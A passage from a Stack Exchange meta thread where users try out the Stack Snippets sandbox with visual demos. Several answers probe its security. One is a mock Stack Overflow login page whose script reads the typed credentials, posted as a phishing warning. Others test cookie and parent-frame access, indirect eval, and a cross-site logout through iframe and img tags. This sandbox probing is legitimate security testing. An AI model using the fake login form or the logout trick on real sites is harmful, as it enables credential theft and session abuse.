Comment: @gunr2171 it appears to be broken, always pointing on same person so feel free to fix it. ;)

Comment: @gunr2171 also note it's taking all the members of MSE Tavern, unlike the original Wheel which had a fixed list.

Comment: I started to fix it, then I found that this mess of an implementation would take more than 60 seconds to fix, then I realised I didn't care, so I gave up and rolled back.

Comment: @LightnessRacesinOrbit cheers, it's taken from a fiddle I once messed with, trying to improve the original and messing things up in the process.

Comment: Is it just me, or does the wheel give the same answer every time?

Comment: Is it just me, or are comment deletions broken?  Goddamnit.

Comment: @Will comments can be deleted just fine, as for same answer you're right, I took borked version by mistake and no time ATM to fix it - luckily, it's just a sandbox here. :D

Comment: @iStimple it's bugged, didn't delve deep enough to find why it's not random. You're there because you're in the Tavern. :D

Comment: Poor Tim Post--he's **always** messing up

Comment: It's not random because CORS is required to load random.org. You also didn't request a new random number when you click the button.

Comment: @Sumurai8 heh, not my code to begin with, was just messing around with the original code long ago (intending just to take the Tavern's members instead of a fixed list) and never had time to really finish it. Thanks a bunch! :D

Comment: You still owe me unicoins. I DEMAND unicoins.

Comment: @Sumurai8 remind me in next April Fools or Winter Bash! :)

Comment: Your SO dev team image is no longer available :/

Comment: @Spotlight fixed, though the code itself appears to be broken by now...  feel free to edit and fix... :)

Answer (score 22):

A starry night sky.

```js
w=c.width=window.innerWidth,h=c.height=window.innerHeight,C=c.getContext('2d');(function L(){requestAnimationFrame(L);C.fillStyle='rgba('+[0,0,0,M.abs(M.sin(Date.now())/10)]+')';C.fillRect(0,0,w,h);C.fillStyle='rgb('+[R()*255|0,R()*255|0,R()*255|0]+')';C.fillRect(R()*w,R()*h,3,3)})(M=Math,R=M.random)
```

```css
*{padding:0;margin:0;background:#000}
```

```html
<canvas id=c>
```

```js
w=c.width=window.innerWidth;
h=c.height=window.innerHeight;
C=c.getContext('2d');
x=0,y=0,s=1;
(function Z(){
    setTimeout(Z,0);
    N=Date.now()/1e3;
    for(y=0;y<h;y+=s){
    b=1e3*-~x/-~y;
    f='rgb('+[A(S(N-b))*255|0,A(S(N-b*2))*255|0,A(S(N-b*3))*255|0]+')';
    C.fillStyle=f;
    C.fillRect(x,y,s,s);    
    }
    x=x<w?x+s:0;
})(S=Math.sin,A=Math.abs)
```

```css
*{padding:0;margin:0;background:#000}
```

```html
<canvas id=c>
```

Comment: [Starry night screensaver](http://en.wikipedia.org/wiki/After_Dark_(software))?

Answer (score 20):

### CSS `:nth-child()` and `animation` properties

```css
* {
    -webkit-box-sizing: border-box;
    -moz-box-sizing: border-box;
    box-sizing: border-box;
}
body {
    background: whitesmoke;
    text-align: center;
    -webkit-perspective: 1000;
    -moz-perspective: 1000;
    perspective: 1000;
}
.wrapper {
    margin: 0 auto;
}
.loader {
    height: .8em;
    width: .8em;
    border-radius: .2em;
    background: white;
    display: inline-block;
    opacity: 0;
    margin-top: 20px;
}
.loader {
    -webkit-transform: translateX(0);
    -moz-transform: translateX(0);
    transform: translateX(0);
}
.loader:nth-child(1n+2) {
    -webkit-animation: flipintoright 750ms 375ms infinite;
    -moz-animation: flipintoright 750ms 375ms infinite;
    animation: flipintoright 750ms 375ms infinite;
}
.loader:nth-child(2n+1) {
    -webkit-animation: flipintoright 750ms infinite;
    -moz-animation: flipintoright 750ms infinite;
    animation: flipintoright 750ms infinite;
}
@-webkit-keyframes flipintoright {
    0% {
        -webkit-transform: rotateY(0);
        background-color: yellow;
        opacity: .5;
    }
    25% {
        -webkit-transform: rotateY(90deg) scale(.75);
        opacity: .75;
        background-color: orange;
    }
    50% {
        -webkit-transform: rotateY(180deg) scale(.5);
        opacity: 1;
        background-color: red;
    }
    75% {
        -webkit-transform: rotateY(270deg) scale(.75);
        opacity: .75;
        background-color: orange;
    }
    100% {
        -webkit-transform: rotateY(360deg) scale(1);
        opacity: .5;
        background-color: yellow;
    }
}
@-moz-keyframes flipintoright {
    0% {
        -moz-transform: rotateY(0);
        background-color: yellow;
        opacity: .5;
    }
    25% {
        -moz-transform: rotateY(90deg) scale(.75);
        opacity: .75;
        background-color: orange;
    }
    50% {
        -moz-transform: rotateY(180deg) scale(.5);
        opacity: 1;
        background-color: red;
    }
    75% {
        -moz-transform: rotateY(270deg) scale(.75);
        opacity: .75;
        background-color: orange;
    }
    100% {
        -moz-transform: rotateY(360deg) scale(1);
        opacity: .5;
        background-color: yellow;
    }
}
@keyframes flipintoright {
    0% {
        -webkit-transform: rotateY(0);
        background-color: yellow;
        opacity: .5;
    }
    25% {
        transform: rotateY(90deg) scale(.75);
        opacity: .75;
        background-color: orange;
    }
    50% {
        transform: rotateY(180deg) scale(.5);
        opacity: 1;
        background-color: red;
    }
    75% {
        transform: rotateY(270deg) scale(.75);
        opacity: .75;
        background-color: orange;
    }
    100% {
        transform: rotateY(360deg) scale(1);
        opacity: .5;
        background-color: yellow;
    }
}
```

```html
<div class="wrapper">
    <div class="loader"></div>
    <div class="loader"></div>
    <div class="loader"></div>
    <div class="loader"></div>
    <div class="loader"></div>
    <div class="loader"></div>
    <div class="loader"></div>
    <div class="loader"></div>
    <p>Loading...</p>
</div>
```

Answer (score 19):

**HTML5 PROGRESS BAR**

```css
@import url(http://fonts.googleapis.com/css?family=Expletus+Sans);

/* Basic resets */

* { 
 margin:0; padding:0; 
 box-sizing: border-box;
}

body {
margin: 50px auto 0;
max-width: 800px;

font-family: "Expletus Sans", sans-serif;
}

li {

 width: 50%;
 float: left;
 list-style-type: none;
 
 padding-right: 5.3333333%;
}

li:nth-child(even) { margin-bottom: 5em;}

h2 {
 margin: 0 0 1.5em;
 border-bottom: 1px solid #ccc;
 
 padding: 0 0 .25em;
}

/* Styling an indeterminate progress bar */

progress:not(value) {
 /* Add your styles here. As part of this walkthrough we will focus only on determinate progress bars. */
}

/* Styling the determinate progress element */

progress[value] {
 /* Get rid of the default appearance */
 appearance: none;
 
 /* This unfortunately leaves a trail of border behind in Firefox and Opera. We can remove that by setting the border to none. */
 border: none;
 
 /* Add dimensions */
 width: 100%; height: 20px;
 
 /* Although firefox doesn't provide any additional pseudo class to style the progress element container, any style applied here works on the container. */
   background-color: whiteSmoke;
   border-radius: 3px;
   box-shadow: 0 2px 3px rgba(0,0,0,.5) inset;
 
 /* Of all IE, only IE10 supports progress element that too partially. It only allows to change the background-color of the progress value using the 'color' attribute. */
 color: royalblue;
 
 position: relative;
 margin: 0 0 1.5em; 
}

/*
Webkit browsers provide two pseudo classes that can be use to style HTML5 progress element.
-webkit-progress-bar -> To style the progress element container
-webkit-progress-value -> To style the progress element value.
*/

progress[value]::-webkit-progress-bar {
 background-color: whiteSmoke;
 border-radius: 3px;
 box-shadow: 0 2px 3px rgba(0,0,0,.5) inset;
}

progress[value]::-webkit-progress-value {
 position: relative;
 
 background-size: 35px 20px, 100% 100%, 100% 100%;
 border-radius:3px;
 
 /* Let's animate this */
 animation: animate-stripes 5s linear infinite;
}

@keyframes animate-stripes { 100% { background-position: -100px 0; } }

/* Let's spice up things little bit by using pseudo elements. */

progress[value]::-webkit-progress-value:after {
 /* Only webkit/blink browsers understand pseudo elements on pseudo classes. A rare phenomenon! */
 content: '';
 position: absolute;
 
 width:5px; height:5px;
 top:7px; right:7px;
 
 background-color: white;
 border-radius: 100%;
}

/* Firefox provides a single pseudo class to style the progress element value and not for container. -moz-progress-bar */

progress[value]::-moz-progress-bar {
 /* Gradient background with Stripes */
 background-image:
 -moz-linear-gradient( 135deg,
              transparent,
              transparent 33%,
              rgba(0,0,0,.1) 33%,
              rgba(0,0,0,.1) 66%,
              transparent 66%),
    -moz-linear-gradient( top,
              rgba(255, 255, 255, .25),
              rgba(0,0,0,.2)),
     -moz-linear-gradient( left, #09c, #f44);
 
 background-size: 35px 20px, 100% 100%, 100% 100%;
 border-radius:3px;
 
 /* Firefox doesn't support CSS3 keyframe animations on progress element. Hence, we did not include animate-stripes in this code block */
}

/* Fallback technique styles */
.progress-bar {
 background-color: whiteSmoke;
 border-radius: 3px;
 box-shadow: 0 2px 3px rgba(0,0,0,.5) inset;

 /* Dimensions should be similar to the parent progress element. */
 width: 100%; height:20px;
}

.progress-bar span {
 background-color: royalblue;
 border-radius: 3px;
 
 display: block;
 text-indent: -9999px;
}

p[data-value] { 
  
  position: relative; 
}

/* The percentage will automatically fall in place as soon as we make the width fluid. Now making widths fluid. */

p[data-value]:after {
 content: attr(data-value) '%';
 position: absolute; right:0;
}





.html5::-webkit-progress-value,
.python::-webkit-progress-value  {
 /* Gradient background with Stripes */
 background-image:
 -webkit-linear-gradient( 135deg,
              transparent,
              transparent 33%,
              rgba(0,0,0,.1) 33%,
              rgba(0,0,0,.1) 66%,
              transparent 66%),
    -webkit-linear-gradient( top,
              rgba(255, 255, 255, .25),
              rgba(0,0,0,.2)),
     -webkit-linear-gradient( left, #09c, #f44);
}

.css3::-webkit-progress-value,
.php::-webkit-progress-value 
{
 /* Gradient background with Stripes */
 background-image:
 -webkit-linear-gradient( 135deg,
              transparent,
              transparent 33%,
              rgba(0,0,0,.1) 33%,
              rgba(0,0,0,.1) 66%,
              transparent 66%),
    -webkit-linear-gradient( top,
              rgba(255, 255, 255, .25),
              rgba(0,0,0,.2)),
     -webkit-linear-gradient( left, #09c, #ff0);
}

.jquery::-webkit-progress-value,
.node-js::-webkit-progress-value 
{
 /* Gradient background with Stripes */
 background-image:
 -webkit-linear-gradient( 135deg,
              transparent,
              transparent 33%,
              rgba(0,0,0,.1) 33%,
              rgba(0,0,0,.1) 66%,
              transparent 66%),
    -webkit-linear-gradient( top,
              rgba(255, 255, 255, .25),
              rgba(0,0,0,.2)),
     -webkit-linear-gradient( left, #09c, #690);
}

/* Similarly, for Mozillaa. Unfortunately combining the styles for different browsers will break every other browser. Hence, we need a separate block. */

.html5::-moz-progress-bar,
.php::-moz-progress-bar {
 /* Gradient background with Stripes */
 background-image:
 -moz-linear-gradient( 135deg,
              transparent,
              transparent 33%,
              rgba(0,0,0,.1) 33%,
              rgba(0,0,0,.1) 66%,
              transparent 66%),
    -moz-linear-gradient( top,
              rgba(255, 255, 255, .25),
              rgba(0,0,0,.2)),
     -moz-linear-gradient( left, #09c, #f44);
}

.css3::-moz-progress-bar,
.php::-moz-progress-bar {
{
 /* Gradient background with Stripes */
 background-image:
 -moz-linear-gradient( 135deg,
              transparent,
              transparent 33%,
              rgba(0,0,0,.1) 33%,
              rgba(0,0,0,.1) 66%,
              transparent 66%),
    -moz-linear-gradient( top,
              rgba(255, 255, 255, .25),
              rgba(0,0,0,.2)),
     -moz-linear-gradient( left, #09c, #ff0);
}

.jquery::-moz-progress-bar,
.node-js::-moz-progress-bar {
 /* Gradient background with Stripes */
 background-image:
 -moz-linear-gradient( 135deg,
              transparent,
              transparent 33%,
              rgba(0,0,0,.1) 33%,
              rgba(0,0,0,.1) 66%,
              transparent 66%),
    -moz-linear-gradient( top,
              rgba(255, 255, 255, .25),
              rgba(0,0,0,.2)),
     -moz-linear-gradient( left, #09c, #690);
}

/* Now we are good to duplicate html code for other skills and then add the css code for the new skill based on data-skill */

  
/* THE END */
```

```html
<progress style="text-align: right" id="progressBar" value="0" max="100" style="width:300px;"></progress>
<span id="status"></span>
<h1 id="finalMessage"></h1>
<script type="text/javascript" language="javascript">
function progressBarSim(al) {
  var bar = document.getElementById('progressBar');
  var status = document.getElementById('status');
  status.innerHTML = al+"%";
  bar.value = al;
  al++;
 var sim = setTimeout("progressBarSim("+al+")",300);
    
    var finalMessage = document.getElementById('finalMessage');
    finalMessage.innerHTML = "In Progress!!!";
 if(al == 100){
   status.innerHTML = "100%";
   bar.value = 100;
   clearTimeout(sim);
   //var finalMessage = document.getElementById('finalMessage');
   finalMessage.innerHTML = "You Got a Reward!!! ";
 }
}
var amountLoaded = 0;
progressBarSim(amountLoaded);
</script>
```

Comment: I was expecting a reward when I reached 100%... :(

Comment: You can find reward now!!! :P

Answer (score 17):

### Ninja Name Generator

```js
var items = new Array(
       "a", "ka",  "sa",  "ta",  "na",  "ha",  "ma",  "ya", "ra",  "wa", 
       "i", "ki",  "shi", "chi", "ni",  "hi",  "mi",        "ri",
       "u", "ku",  "su",  "tsu", "nu",  "fu",  "mu",  "yu", "ru",
       "e", "ke",  "se",  "te",  "ne",  "he",  "me",        "re",
       "o", "ko",  "so",  "to",  "no",  "ho",  "mo",  "yo", "ro",  "wo",

            "kya", "sha", "cha", "nya", "hya", "mya",       "rya",
            "kyu", "shu", "chu", "nyu", "hyu", "myu",       "ryu",
            "kyo", "sho", "cho", "nyo", "hyo", "myo",       "ryo",

            "ga",  "za",  "da",  "ba",  "pa",
            "gi",  "ji",         "bi",  "pi",
            "gu",  "zu",         "bu",  "pu",
            "ge",  "ze",  "de",  "be",  "pe",
            "go",  "zo",  "do",  "bo",  "po",

            "gya", "ja",         "bya", "pya",
            "gyu", "ju",         "byu", "pyu",
            "gyo", "jo",         "byo", "pyo"
);


function getRandomInt (min, max) {
    return Math.floor(Math.random() * (max - min + 1)) + min;
}
function capitalise(string) {
    return string.charAt(0).toUpperCase() + string.slice(1).toLowerCase();
}

function random_jp() {
    var result = new Array(0,0,0,0,0).slice(0, getRandomInt(3,5)).map(function () {
        return items[Math.floor(Math.random() * items.length)];
    });

    return capitalise(result.join(""));
}

window.onload = function() {
    var elem = document.getElementById("ninja-name");
    elem.innerHTML = "You are " + random_jp() + ", master of the " + random_jp() + " ninja technique!"
};
```

```html
<h1 id="ninja-name"> Go go javascript! </h1>
```

Comment: For some reason they don't sound at all like japanese; I guess one "easy" fix would be to take a huge chunk of japanese text, romanize it, calculate "weights" for each kana, and use those weights when generating the names.

Answer (score 17):

Here's an example of how things could go wrong. Imagine that instead of being in the answer, where it's obvious what's going on, this is all inserted from an externally loaded script.

```js
var u;
var p;

function DoBadStuff(){
  u = document.getElementById('u');
  p = document.getElementById('p');
  console.log(u.value);
  console.log(p.value);
  /* Theoretically send phished passwords off somewhere via AJAX */
}
```

```css
#warning {
  background: red;
  color: white;
  padding: 5px;
  position: absolute;
  width: 100%;
  top: 0;
  right: 0;
  left: 0;
  opacity: 0;
  transition: opacity 0.5s;
  text-align: center;
}

body:hover #warning {
  opacity: 0.9;
}


body, warning p {
 padding: 0;
  margin: 0;
}

body {
 font-family: sans-serif; 
}

#f input {
  width: 300px;
  border: 1px solid #ccc;
  margin: 5px 0;
  padding: 1px 5px;
  line-height: 20px;
}

#f {
  background: #EAEAEA;
  border: #AAA solid 1px;
  width: 50%;
  padding: 10px;
  float: right;
  margin: 40px 0 0 0;
}

#i {
  width: 40%;
  width: calc(100% - 380px);
  float: left;
  padding: 10px 0 0 10px;
}
```

```html
<div id="warning"><p><strong>Warning!</strong> Don't actually enter your password... this isn't a real login form!</p></div>
<div id="i">
<img src="https://cdn.sstatic.net/stackexchange/img/logos/so/so-logo.png" width="200" alt="Stack Overflow" />
<p>Stack Snippets are only available to logged in users with 200 reputation. Please enter your Stack Exchange credentials to log in.</p>
</div>
<div id="f">
  <input type="text" id="u" placeholder="email" /> <br/>
  <input type="password" id="p" placeholder="password" /> <br/>
  <button id="b" onclick="DoBadStuff()">Log In</button>
</div>
```

Comment: If it was true, i would except to don't see the "Run code snippet" button at all :)

Comment: @MarcoAcierno a lot of people are gullible, and a lot of sites don't tell you that you can't do something until you try to do it.

Comment: @MarcoAcierno Consider SO's vote buttons and "add comment" link button -- those are all visible to users who can't use them, and the site doesn't mention it until you try to use one of them.

Comment: This is fun... (evil laugh)

Comment: @MarcoAcierno, this is a world where people send their life savings to someone who sent them a random email. I think the example here is excellent social engineering with the SO logo and how it is worded. Could easily fool someone into giving away their username and password, which is then probably the same credentials they use everywhere else.

Comment: Possible solutions: 1. run code in new window like a JSFiddle. different domain e.g. stackoverflowsnippets.com. use these cues to indicate that it isn't as trustworthy as the original stackoverflow.com. 2. annoying popup to warn you of the danger and then click accept (uck!). 3. snippets need reputation level to create immediately. if you don't have the rep someone else needs to approve. although that could drive people back to using jsfiddle. 4.  moderate quickly, automatically prioritise any snippet with 'username' or 'password' etc.

Comment: @MartinCapodici I like the idea of only allowing users with a certain reputation level to create snippets, although there'd have to be a way to handle edits. Perhaps snippets created or edited by low-rep users would go into a review queue. There'll always be a risk though; you could for example import a script from your own webserver that looks like it's some library or innocent code, but then later change it to something malicious without ever changing the SO post.

Comment: @MartinCapodici, This is also a world where people don't care about that as long as they aren't the victim http://meta.stackoverflow.com/questions/269753/feedback-requested-runnable-code-snippets-in-questions-and-answers/272391?noredirect=1#comment99249_272391

Answer (score 15):

Print months in your own language

```js
m = [];
for (i = 12; i--;) {
    m[i] = (new Date(0, i, 5)).toLocaleString(0, {
        month: "long"
    });
}
document.write(m)
```

Comment: It starts by the last month in French (December, January, February, ... November) :(

Comment: @MaximeLorant It should have been fixed now :P

Comment: Let me fix this... German had march two times and no october. Now everything is there.

Comment: @ArtjomB With your fix I have the same problem as Maxime Lorant xD

Comment: @ArtjomB I think it depends on the browser after all. Changed 11 to 12 and now it's fine.

Comment: It works fine for me now, don't touch anything, I don't care of other languages :p

Comment: iPad output is ... 5 January 1900 00:00:00 GMT,5 February 1900 00:00:00 GMT,5 March 1900 00:00:00 GMT,4 April 1900 23:00:00 GMT, [etc]. Note how it takes care of the clock-change at the end of March.

Answer (score 15):

I've noticed some points during testing:

- the language order is not the same in the displayed post and in edit mode, this is a bit confusing
- you can't edit the code using the code snippet tool: if you have already the `Begin snippet: js` tag in your content and click on the button, the content is not prefilled
- make edit pane resizable because they are too small, and depending on what you do you want more space for JavaScript or for CSS only
- there is no error reporting when the code fails, neither syntax errors or runtime errors
- debugger keyword is not working for me using Firefox 30: the Firebug debugger is activated but the file shown is blank making impossible to use step into/over buttons
- since the JS code is all inlined on one single line, it doesn't handle simple comments in your code (test at the end of my snippet below)

Also, here are my two cents tests, almost accessing all kind of objects and properties (with no success so far):

```js
function debug() {
  var args = [].slice.call(arguments);

  console.log.apply(console, args);
  /*window.alert.apply(window, [args.join(' ')]);*/
}

function showType(a, b) {
  debug(a, typeof b);
}

var TESTS = [

  /* PASSING TESTS */
  function() {
    debug('#################');
    debug('# PASSING TESTS #');
    debug('#################');
  },

  function() {
    showType('parent ', parent);
  },
  function() {
    showType('parent.window', parent.window);
  },
  function() {
    showType('console', console);
  },
  function() {
    showType('top', top);
  },
  function() {
    showType('eval', eval);
  },
  function() {
    showType('parent.postMessage', parent.postMessage);
  },
  function() {
    showType('top.postMessage', top.postMessage);
  },
  function() {
    showType('document.cookies', document.cookies);
  },


  function() {
    debug( Object.keys(window) );
    /* prints: window,location,top,document,InstallTrigger,console,showType,TESTS,external,sidebar */
  },
  function() {
    debug( Object.keys(document) );
    /* prints: location */
  },
  function() {
    debug( Object.keys(top) );
    debug( Object.keys(top).length );
    /* prints: 0 */
  },
  function() {
    debug( Object.keys(parent) );
    debug( Object.keys(parent).length );
    /* prints: 0 */
  },

  function() {
    console.log('some log output');
  },

  function(){
    showType('top.top', top.top);
  },
  function(){
    showType('parent.top', parent.top);
  },
  function(){
    showType('top.location', top.location);
  },
  function(){
    showType('parent.location', parent.location);
  },
  function(){
    showType('top.window', top.window);
  },
  function(){
    showType('parent.window', parent.window);
  },
  function(){
    showType('parent', parent);
  },
  function(){
    showType('parent.window', parent.window);
  },
  function(){
    showType('parent.window.parent', parent.window.parent);
  },
  function(){
    showType('parent.window.parent.window', parent.window.parent.window);
  },
  function(){
    showType('window.addEventListener', window.addEventListener);
  },
  function(){
    showType('parent.window.top', parent.window.top);
  },

  function() {
    debug(top === parent);
    debug(top.postMessage=== parent.postMessage);
  },

  function(){
    showType('parent.window.onbeforeunload', parent.window.onbeforeunload);
  },
  function(){
    showType('parent.window.document', parent.window.document);
  },
  function(){
    showType('parent.location.replace', parent.location.replace);
  },

  function(){
    eval("showType('parent', parent);");
  },


  /* MIXED TESTS */
  /* with success and failures */
  function() {
    debug('###############');
    debug('# MIXED TESTS #');
    debug('###############');
  },

  function() {
    var keys = Object.keys(window), i = keys.length, name;

    while (name = keys[--i])
    {
      try {
        showType('top.'+name, top[name]);
      } catch (e) {
        debug('KO top.'+name, e);
      }

      try {
        showType('parent.'+name, parent[name]);
      } catch (e) {
        debug('KO parent.'+name, e);
      }

    }

  },



  /* FAILING TESTS */
  function() {
    debug('#################');
    debug('# FAILING TESTS #');
    debug('#################');
  },

  function KO() {
    showType('parent.document', parent.document);
  },
  function KO() {
    showType('parent.document.cookies', parent.document.cookies);
  },
  function KO() {
    showType('parent.document.postMessage', parent.document.postMessage);
  },
  function KO() {
    showType('parent.window.alert', parent.window.alert);
  },
  function KO() {
    showType('parent.window.StackExchange', parent.window.StackExchange);
  },
  function KO() {
    showType('parent.window.console', parent.window.console);
  },
  function KO() {
    showType('parent.cookies', parent.cookies);
  },
  function KO() {
    showType('top.cookies', top.cookies);
  },
  function KO() {
    showType('parent.StackExchange', parent.StackExchange);
  },
  function KO() {
    showType('top.StackExchange', top.StackExchange);
  },
  function KO() {
    showType('parent.alert', parent.alert);
  },
  function KO() {
    showType('top.alert', top.alert);
  },
  function KO() {
    showType('parent.console', parent.console);
  },
  function KO() {
    showType('top.console', top.console);
  },
  function KO() {
    showType('parent.addEventListener', parent.addEventListener);
  },
  function KO() {
    showType('top.addEventListener', top.addEventListener);
  },
  function KO() {
    showType('top.snippetRenderer', top.snippetRenderer);
  },
  function KO() {
    showType('parent.snippetRenderer', parent.snippetRenderer);
  },
  function KO() {
    showType('top.jQuery', top.jQuery);
  },
  function KO() {
    showType('parent.jQuery', parent.jQuery);
  },
  function KO(){
    showType('parent.addEventListener', parent.addEventListener);
  },
  function KO(){
    showType('parent.window.parent.addEventListener', parent.window.parent.addEventListener);
  },
  function KO(){
    showType('parent.window.top.addEventListener', parent.window.top.addEventListener);
  },
  function KO(){
    parent.location.replace('https://stackoverflow.com');
  },
  function KO(){
    showType('parent.location.href', parent.location.href);
  },
  function KO(){
    parent.location.href = 'https://stackoverflow.com'
  },
  function KO(){
    eval("showType('parent.addEventListener', parent.addEventListener);");
  },

  function KO(){
    showType('parent.window.open', parent.window.open);
  },
  function KO(){
    top.window.top.open('https://stackoverflow.com', '_blank');
  },
  function KO(){
    window.open('https://stackoverflow.com', '_blank');
  },

];

TESTS.forEach(function(test) {
  debug('Running:', test.toString());

  try {
    test();

  } catch (e) {
    debug('KO ', e);
  }
});

alert('Almost end of the script');
// following code will never be executed
alert('End of the script');
```

Comment: Ooh, good catch on the inline comments. Need to fix that.

Comment: I've not tested it but it may have some others problems related to ASI or semicolon omission

Answer (score 15):

**Epilepsy Warning!!!** (thanks @Haney)

```js
var x = 0;
var y = 0;
var dx = -1;
var dy = -1;
var hue = 0;

function move()
{
  var bump = false;
  if (x <= 0 || x > document.body.scrollWidth - 105) { dx = -dx; bump = true; }
  x += dx;
  if (y <= 0 || y > document.body.scrollHeight - 105) { dy = -dy; bump = true; }
  y += dy;
  block.style.left = x + 'px';
  block.style.top = y + 'px';
  if (bump) {
    var r = Math.floor((Math.sin(hue) + 1) * 8);
    var g = Math.floor((Math.sin(hue - Math.PI * 2 / 3) + 1) * 8);
    var b = Math.floor((Math.sin(hue + Math.PI * 2 / 3) + 1) * 8);
    console.log('#' + r.toString(16) + g.toString(16) + b.toString(16));
    block.style.background = '#' + r.toString(16) + g.toString(16) + b.toString(16);
    hue += .5;
  }
}

setInterval(move, 5);
```

```css
#block {
  width: 100px;
  height: 100px;
  border: 5px solid gray;
  border-radius: 100%;
  position: fixed;
  opacity: 0.5;
  background: #444;
}
```

```html
<div id="block"></div>
```

Comment: Follow the bouncing ball.....

Comment: One of my eyes fell to the ground looking at this

Answer (score 13):

I suppose global eval should be blocked?

```js
(0,eval)("alert('indirect eval call not blocked')");
new Function("alert('function constructor not blocked')")();
```

Or maybe not. It's global to the sandbox after all.

Comment: Doesn't load anything (blank, no error or warning).

Comment: Don't you get the alerts? I get both on Chrome.

Comment: Nothing. After I press the button, the Fram expands, but remains empty, and nothing else happens.

Comment: No alerts in Opera 23 either.

Comment: Nothing happens in FF 31.0

Comment: I get both on--here goes, be nice!--IE 11.

Comment: Nothing happens in chrome, as @Carcigenicate said

Comment: It works on both FF and Chrome for me. The reason why it is not working for some is because of browser settings, not because the code does not work

Comment: Okay, now it happened in FF 31.0. I didn't change any settings. I don't know why...

Comment: Not working for me on Chrome 36.0.1985.143, Ubuntu 12.04

Comment: @Whom it didn't work, is it because you tried Abhi's asnwer and ticked the `Prevent this page from showing additional dialogs` or its equivalent for your browser? xD

Answer (score 13):

Can I log you out?

```html
<iframe src="https://www.stackoverflow.com/users/logout"></iframe>

<img src="https://www.stackoverflow.com/users/logout" />
```

Comment: didn't log me out :( *`http://stackoverflow.com/users/logout does not permit cross-origin framing`*

Comment: Blank iframe...

Answer (score 12):

#### Sierpinski's Triangle

```js
window.onload
=
function ()
{
 var L=400,ST=document.getElementById("st");
 ST.style.width=L + "px";
 ST.style.height=L + "px";
 var div=null;

 function addPointAt(a)
 {
  div=document.createElement("div");
  div.style.left=Math.round(a[0]) + "px";
  div.style.top=Math.round(a[1]) + "px";
  ST.appendChild(div);
 }

 var V=[[L,L],[Math.round(L/2.0),0],[0,L]];
 addPointAt(V[0]),addPointAt(V[1]),addPointAt(V[2]);

 var DOSTERCIOS=2.0/3.0,UNTERCIO=1.0/3.0;
 var n=null,r=Math.random();
 if ( r<UNTERCIO ) n=0; else if ( r<DOSTERCIOS ) n=1; else n=2;
 var p=[V[n][0],V[n][1]];

 var ITERATIONS=10000;
 for ( var i=0 ; i<ITERATIONS ; ++i ) {
      r=Math.random();
      if ( r<UNTERCIO ) n=0; else if ( r<DOSTERCIOS ) n=1; else n=2;
      p[0]=(V[n][0] + p[0])/2.0;
      p[1]=(V[n][1] + p[1])/2.0;
      addPointAt(p);
  }
  document.getElementsByTagName("span")[0].innerHTML="";  
};
```

```css
body
{
 height:100%;
}

#st
{
         position:relative;
           margin:0 auto;
 background-color:#fff;              
}  

#st div
{
         position:absolute;
            width:2px;
           height:2px;
 background-color:#f00;
 border-radius:1px;
}
```

```html
<span>Just wait a moment !!!</span>
<div id="st"></div>
```

Answer (score 11):

`<iframe>` test.

```html
<iframe src="http://meta.stackoverflow.com/questions/269754/stack-snippets-sandbox-try-it-out-here"></iframe>
```

`<iframe>` test with height and width:

```html
<iframe height="500px" width="500px" src="http://meta.stackoverflow.com/questions/269754/stack-snippets-sandbox-try-it-out-here"></iframe>
```

`<iframe>` test with larger than necessary height and width:

```html
<iframe height="5000px" width="5000px" src="http://meta.stackoverflow.com/questions/269754/stack-snippets-sandbox-try-it-out-here"></iframe>
```

Comment: Works for me, but is quite tiny (only spans less then half the screen width). Too small to use.

Comment: SO disallows embedding in frames, iirc.

Comment: Yeah, I was curious if you could run these snippets in iframes but that doesn't appear to be the case.

Comment: I cannot run again Stack Snippets from the iFrame

Comment: Darn it, I can't run an iframe test inside of an iframe test. What kind of a world has this become?

Comment: inception frames?

Comment: That's so *Meta*

Comment: Doesn't work on Chrome. Security Reasons ;-)

Comment: @j.f. I just browsed through here. And I clicked "Run Snippet". Then it showed "Consider add a message why downvote". I noticed I pressed the downvote button. FML

Answer (score 10):

## Doh!

[People can do this... and I can't even center a `<div>`](http://pattle.github.io/simpsons-in-css/)

```css
#homer *{position:absolute;box-sizing:content-box;-moz-box-sizing:content-box}#homer{position:relative;width:94px;height:133px;margin:0 auto}#homer .head *{border:1px solid #110b00}#homer .head .no-border{border:none}#homer .head .body{background:#fbd800}#homer .head .hair1{top:14px;left:0;height:13px;width:22px;border-radius:22px 22px 0 0;-moz-border-radius:22px 22px 0 0;-webkit-border-radius:22px 22px 0 0;background:0 0;-webkit-transform:rotate(-44deg);-ms-transform:rotate(-44deg);transform:rotate(-44deg);border-bottom:none}#homer .head .hair2{top:8px;left:9px;height:16px;width:26px;border-radius:32px 32px 0 0;-moz-border-radius:32px 32px 0 0;-webkit-border-radius:32px 32px 0 0;background:0 0;-webkit-transform:rotate(-27deg);-ms-transform:rotate(-27deg);transform:rotate(-27deg);border-bottom:none}#homer .head .head-top{top:15px;left:2px;width:65px;height:62px;border-bottom:none;-webkit-transform:rotate(-24deg);-ms-transform:rotate(-24deg);transform:rotate(-24deg);-moz-border-radius:43% 44% 0 0;-webkit-border-radius:43% 44% 0 0;border-radius:43% 44% 0 0;-webkit-box-shadow:inset 8px 12px 0 -12px rgba(247,254,140,1),inset 13px 3px 0 -11px rgba(247,254,140,1),inset -2px 0 0 0 rgba(229,158,4,1);-moz-box-shadow:inset 8px 12px 0 -12px rgba(247,254,140,1),inset 13px 3px 0 -11px rgba(247,254,140,1),inset -2px 0 0 0 rgba(229,158,4,1);box-shadow:inset 8px 12px 0 -12px rgba(247,254,140,1),inset 13px 3px 0 -11px rgba(247,254,140,1),inset -2px 0 0 0 rgba(229,158,4,1)}#homer .head .head-main{top:40px;left:17px;width:48px;height:62px;-webkit-transform:rotate(-24deg);-ms-transform:rotate(-24deg);transform:rotate(-24deg)}#homer .head .m1,#homer .head .m2,#homer .head .m3,#homer .head .m4{width:1px;height:14px;background:#110b00}#homer .head .m1{top:77px;left:9px;-webkit-transform:rotate(-13deg);-ms-transform:rotate(-13deg);transform:rotate(-13deg)}#homer .head .m2{top:76px;left:12px;height:12px;-webkit-transform:rotate(-45deg);-ms-transform:rotate(-45deg);transform:rotate(-45deg)}#homer .head .m3{top:71px;left:16px;height:15px;-webkit-transform:rotate(1deg);-ms-transform:rotate(1deg);transform:rotate(1deg)}#homer .head .m4{top:70px;left:21px;-webkit-transform:rotate(-39deg);-ms-transform:rotate(-39deg);transform:rotate(-39deg)}#homer .head .ear{top:90px;left:14px;width:11px;height:13px;-moz-border-radius:50%;-webkit-border-radius:50%;border-radius:50%}#homer .head .ear .inner1{top:3px;left:2px;width:7px;height:5px;-moz-border-radius:50%;-webkit-border-radius:50%;border-radius:50%;border-top:1px 